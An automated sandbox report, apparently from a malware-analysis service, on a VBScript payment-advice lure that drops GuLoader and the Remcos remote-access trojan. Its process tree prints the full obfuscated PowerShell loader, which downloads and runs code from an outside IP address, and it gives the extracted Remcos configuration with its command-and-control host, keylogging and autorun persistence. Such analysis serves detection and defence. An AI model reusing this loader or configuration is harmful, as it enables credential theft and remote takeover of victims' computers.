
Windows Analysis Report
PAYMENT - STATEMENT ADVISE.vbs

Overview

General Information

Sample name: PAYMENT - STATEMENT ADVISE.vbs
Analysis ID: 1467964
MD5: 8e3c190eff5e1e796f9cd8ac0eb18d0b
SHA1: 751c299c930a6975b1f311c3d645554d0cfe8654
SHA256: a1b94e324beb19da2cabb254652df7c75dfcdad3c099012bb10e06448198d204
Tags: RATRemcosRATvbs

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7160 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. 
retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno 
NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng 
LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker 
EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6456 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1084 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. 
retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno 
NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng 
LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker 
EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3180 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5652 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 3228 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 6396 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 3748 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5608 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000005.00000002.2447272423.00000000089C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
